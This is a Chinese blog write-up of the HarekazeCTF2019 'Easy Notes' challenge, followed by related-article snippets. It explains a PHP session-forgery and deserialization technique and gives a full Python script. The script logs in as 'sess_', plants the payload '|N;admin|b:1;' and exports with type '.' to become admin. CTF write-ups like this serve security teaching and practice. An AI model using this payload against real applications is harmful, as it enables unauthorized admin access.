[HarekazeCTF2019]Easy Notes

最新推荐文章于 2024-06-13 09:34:21 发布
最新推荐文章于 2024-06-13 09:34:21 发布
阅读量1.1k 收藏
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43801002/article/details/105785233
版权

#题目
image.png
*有源码,是一个笔记本系统
*在登陆处进行了匹配,只允许输入 4 到 64 位规定字符,且不是前端验证
*点击get flag提示不是admin
image.png
#flag.php

  <section>
        <h2>Get flag</h2>
        <p>
          <?php
          if (is_admin()) {
            echo "Congratulations! The flag is: <code>" . getenv('FLAG') . "</code>";
          } else {
            echo "You are not an admin :(";
          }
          ?>
        </p>
      </section>

需要满足is_admin()函数才会给你flag
那我们去看一下is_admin()方法
好像也没有什么东西

  • session 文件以 sess_ 开头,且只含有 a-zA-Z0-9-

  • 看到 $filename 处可以满足所有的条件

    image

  • 构造 user 为 sess_ ,type 为 . ,经过处理之后,$path 就是 TEMP_DIR/sess_0123456789abcdef 这就伪造了一个 session 文件

  • 然后向这个文件写入 note 的 title

    image

  • php 默认的 session 反序列化方式是 php ,其存储方式为 键名+竖线+经过serialize函数序列处理的值 ,这就可以伪造 admin 了

  • 在最后,它会将构造的 $filename 返回,这样就可以拿到构造出的 admin 的 session 数据

    image

session 伪造,session 反序列化

import re
import requests
URL = 'http://32992b00-dbfe-47e5-ac0f-4657682bfb40.node3.buuoj.cn/'

while True:
	# login as sess_
	sess = requests.Session()
	sess.post(URL + 'login.php', data={
		'user': 'sess_'
	})

	# make a crafted note
	sess.post(URL + 'add.php', data={
		'title': '|N;admin|b:1;',
		'body': 'hello'
	})

	# make a fake session
	r = sess.get(URL + 'export.php?type=.').headers['Content-Disposition']
	print(r)
	
	sessid = re.findall(r'sess_([0-9a-z-]+)', r)[0]
	print(sessid)
	
	# get the flag
	r = requests.get(URL + '?page=flag', cookies={
		'PHPSESSID': sessid
	}).content.decode('utf-8')
	flag = re.findall(r'HarekazeCTF\{.+\}', r)

	if len(flag) > 0:
		print(flag[0])
		break

image.png
替换session

文章来源peri0d师傅!

浩歌已行
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFNote:CTFNote是一种协作工具,旨在帮助CTF团队组织工作
04-12
周大福 欢迎 CTFNote是一种协作工具,旨在帮助CTF团队组织工作。 安装 使用提供的docker配置来部署项目: $ docker-compose up -d 然后,访问127.0.0.1并创建您的第一个帐户,该帐户将自动具有管理员权限 您可以根据需要选择编辑API配置文件: 礼遇 ADMIN_ALL:可以创建CTF,任务,编辑用户/配置。 EDIT_CTF:可以创建和修改CTF信息; 您应该将此权利授予您的队长 CTF_ALL:可以加入每个CTF; 您应该将此权利授予您的团队成员。 无权限:只能在受邀时查看CTF; 这用于不定期的客人。 允许CTF来宾创建和编辑任务,但不允许创建和编辑任务。 发展 开发服务器包括一个简单的HTTP代理,允许前端访问本地API(cf )。 同时在两个组件上都配置了热重装。 设置并启动前端 $ cd front/ $ yarn instal
easy-notes-client:简笔记(easy notes)客户端,基于 Vue.js 、Ant Design 开发
05-26
简笔记(easy notes)客户端,基于 Vue.js 、Ant Design 开发。 演示 演示地址: 部分截图: Project setup npm install Compiles and hot-reloads for development npm run serve Compiles and minifies for ...
[HarekazeCTF2019]Easy Notes-代码审计
leekos的博客,分享web安全相关知识~
08-24 240
会被替换为空,所以最终文件名就符合session文件的格式了,session文件名可控。目录下面,所以我们可以尝试session伪造一下,伪造一个session文件。如果我们能够控制session文件,就可以拿到flag了。登录之后有几个功能点,可以添加节点,然后使用。我们发现想要拿到flag的条件时。这里可以看到,导出的文件也是写到。会生成16进制字符串,
推荐开源项目:EasyNotes - 简洁高效的笔记应用
最新发布
gitblog_00010的博客
06-13 334
推荐开源项目:EasyNotes - 简洁高效的笔记应用 EasyNotesEasyNotes: Jetpack Compose MVVM for seamless note-taking. Effortless creation, editing, and organization.项目地址:https://gitcode.com/gh_mirrors/ea/EasyNotes 1、项目介绍 ...
BUUCTF:[HarekazeCTF2019]Easy Notes
末初的CSDN博客
07-24 1728
BUUCTF:[HarekazeCTF2019]Easy Notes
BUUCTF--[HarekazeCTF2019]Easy Notes
qq_46263951的博客
08-07 465
<section> <h2>Get flag</h2> <p> <?php if (is_admin()) { echo "Congratulations! The flag is: <code>" . getenv('FLAG') . "</code>"; } else { echo "You are not an admin :("; } ?&gt.
Easy Notes-crx插件
04-03
Easy Notes在这里解决了这个问题。 只需单击一个按钮,您就可以从任何网页开始做笔记。 您再也不必为记笔记而苦恼。 功能-可以从任何网站访问-一次可以有多个笔记-可以通过触摸按钮打开。下载Easy Notes并成为笔记...
Easy Notes v5.06 Beta 2
11-01
Easy Notes就是一个急你之所急,想你之所想的笔记程序。有别于Windows自带的记事本,Easy Notes不仅可以自由书写,而且还可以使用RTF格式进行文档格式化。为时刻提醒你注意,它还可以被定点戳在你的桌面上,并且以带...
[HarekazeCTF2019]Easy Notes(session伪造)
paidx0
08-24 485
[HarekazeCTF2019]Easy Notes(session伪造)
ctf_notes:通过进行大量CTF收集的笔记,以帮助进一步的CTF
04-14
ctf_notes 通过进行大量CTF收集的笔记,以帮助进一步的CTF -------------------------------------------------- --------------------------------------- Windows和* nix: -密码喷涂: crackmapexec [模块] -u [users.txt] -p [passwords.txt] [ip或ip范围] -bruteforce(可能需要更多选项,使用的示例是SSH模块): medusa -h [ip] -U [users.txt] -P [passwords.txt] -M [模块] [ip] 一般注意事项: 已知的主机ssh文件将显示该主机已通过SSH进入的所有主机 -重置中断的终端会话的命令 $>重置 -使用私有rsa而不是密码的ssh: ssh -i
[BUUCTF-pwn] [HarekazeCTF2019]Harekaze Note
weixin_52640415的博客
01-10 684
未知高版本libc的堆问题 题目给了libc但下不来。 一般2.23的堆没有tcache第一个块在010,2.27以后加了250的tcache第1个在260,2.31以后在2a0 可以先泄露堆地址再根据大概的版本往下走。 先按2.27在本地作成,发现远程不能用,虽然小于2.31但tcache不能直接doublefree。应该用fastbinattack 。 漏点: 这里的块建content后在0x20处有个指向content的指针,在free以后清除,重建里这个位置没有覆盖,形成UAF,但使用起
[HarekazeCTF2019]encode_and_encode
m0_62905261的博客
07-24 391
[HarekazeCTF2019]encode_and_encode
web ctf note
m0_50967960的博客
04-01 313
phpMyAdmin 4.8.x 本地文件包含漏洞利用 读取flag文件 /phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag
[HarekazeCTF2019]baby_rop2
m0sway的博客
04-07 1025
[HarekazeCTF2019]baby_rop2 WriteUp BUU_PWN
[BUUCTF]PWN——[HarekazeCTF2019]baby_rop2
2302_79899078的博客
01-19 512
小萌新一个,仅供参考。
CTF特训日记day2
weixin_46483787的博客
12-06 548
day2打了一个叫NBCTF的比赛做了四个题,剩下五道arm的题不会做了,关注一下wp,也许可以靠这个比赛提升一波异架构能力。
ByteCTF note_five 经验总结
qq_43189757的博客
10-10 826
每到接触新知识得时候总要花不少力气搞懂(汗,这题是关于改写global_max_fast 再通过fastbin attack来getshell, 总结一下学到的知识点和解题思路 思路: 这题限制了chunk的size, 大小为0x8f~0x0x400,在edit info 函数处存在 off-by-one 漏洞,通过这个漏洞可以改写chunk的size 一开始的思路是创建几个chunk,然后通过修...
[roarctf 2019]easy calc
03-16
这道题是一道简单的逆向工程题目,给出了一个计算器程序和加密后的标志,需要我们破解加密算法并计算出正确的标志。 我们可以使用反编译工具对程序进行反编译,然后找到加密算法的相关代码。在这个程序中,加密算法使用了一种简单的替换算法,它会将输入字符串中的每个字符替换成固定的字符。 我们只需要编写一个解密程序,使用相同的替换表将加密后的标志还原成原始标志。一旦还原了标志,我们就可以提交它来获得得分。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值